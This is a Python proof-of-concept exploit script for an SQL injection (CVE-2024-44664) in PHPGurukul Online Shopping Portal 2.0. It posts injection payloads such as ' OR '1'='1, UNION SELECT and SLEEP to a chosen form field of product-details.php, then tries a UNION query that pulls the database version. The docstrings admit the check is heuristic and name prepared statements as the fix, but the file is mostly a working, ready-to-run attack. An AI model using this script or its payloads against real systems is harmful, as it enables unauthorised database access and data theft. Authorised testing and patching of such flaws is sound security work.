import requests
import sys
# CVE-2024-44664 SQL Injection PoC
# Target: PHPGurukul Online Shopping Portal 2.0 - product-details.php
# Vulnerable Parameters: name, summary, review, quality, price, value
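def test_sql_injection(url, param):
    """
    Probe one POST parameter for error-based signs of SQL injection.

    Each payload is posted as the value of ``param``. A hit is reported when
    the response contains a database-error marker that a baseline response
    (same parameter, harmless value) does not already contain. Without the
    baseline, generic markers such as 'Warning' or 'MySQL' match ordinary
    page text and produce false positives.

    Limitations a reader should keep in mind:
      * A True result means error text appeared, not that a query was
        altered; treat it as a lead to verify in the application code.
      * Response time is never measured, so the SLEEP payload is judged
        only by the same error-marker check as the others.

    The durable fix for the fields named in the file header is server-side:
    bind them as parameters of a prepared statement instead of building the
    query string from request data.

    Args:
        url: Endpoint that receives the POST request.
        param: Name of the form field that carries the payload.

    Returns:
        True on the first payload whose response shows a new error marker,
        False if none does (including when every request fails).
    """
    # Payloads as given by the original author; kept unchanged.
    payloads = [
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
        "1' ORDER BY 1--"
    ]
    error_markers = ('SQL syntax', 'MySQL', 'Warning', 'mysql_fetch')
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    # Baseline with a harmless, constructed value: markers already present on
    # the normal page cannot count as evidence. If the baseline request fails,
    # fall back to checking every marker, as the original did.
    try:
        baseline_text = requests.post(
            url, data={param: 'test'}, headers=headers, timeout=10
        ).text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        baseline_text = ''
    new_markers = [m for m in error_markers if m not in baseline_text]

    for payload in payloads:
        try:
            response = requests.post(
                url, data={param: payload}, headers=headers, timeout=10
            )
        except requests.exceptions.RequestException as e:
            # One failed request must not stop the remaining checks.
            print(f"[-] Request error: {e}")
            continue

        if any(marker in response.text for marker in new_markers):
            print(f"[+] Potential SQL Injection detected with payload: {payload}")
            print(f"[+] Response length: {len(response.text)}")
            return True
    return False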
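def extract_data(url, param):
    """
    Send one UNION-based payload and look for a version-like marker.

    The payload selects ``@@version`` in the second of six columns, so it
    only lines up with a query that returns exactly six columns; that count
    is assumed here, not discovered.

    The check is a plain substring test for '5.' or '8.' anywhere in the
    response. Such text is common in ordinary pages (a price, for example),
    so a True result is a hint only. Nothing is parsed out of the response,
    which is why the printed message no longer claims a successful
    extraction.

    Args:
        url: Endpoint that receives the POST request.
        param: Name of the form field that carries the payload.

    Returns:
        True if the response contains '5.' or '8.', otherwise False
        (including when the request fails).
    """
    # Database version payload as given by the original author.
    payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL--"
    try:
        response = requests.post(url, data={param: payload}, timeout=10)
    except requests.exceptions.RequestException as e:
        # Narrowed from a blanket `except Exception` to match
        # test_sql_injection; programming errors should surface.
        print(f"[-] Error: {e}")
        return False

    if '5.' in response.text or '8.' in response.text:
        # The original message said the version was "extracted successfully",
        # but no value is ever read from the response.
        print("[*] Response contains a version-like marker ('5.' or '8.'); extraction not verified")
        return True
    return False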
if __name__ == '__main__':
    # Two positional arguments are required: the endpoint URL and the name of
    # the POST field to probe.
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <url> <parameter>")
        print(f"Example: python {sys.argv[0]} http://target.com/product-details.php name")
        sys.exit(1)

    target_url, target_param = sys.argv[1], sys.argv[2]

    print(f"[*] Testing CVE-2024-44664 SQL Injection")
    print(f"[*] Target: {target_url}")
    print(f"[*] Parameter: {target_param}")

    # test_sql_injection is a heuristic marker check, so "confirmed" below
    # reflects only that check; the follow-up request runs only after a hit.
    if not test_sql_injection(target_url, target_param):
        print("[-] No SQL injection detected")
    else:
        print("[!] Vulnerability confirmed!")
        extract_data(target_url, target_param)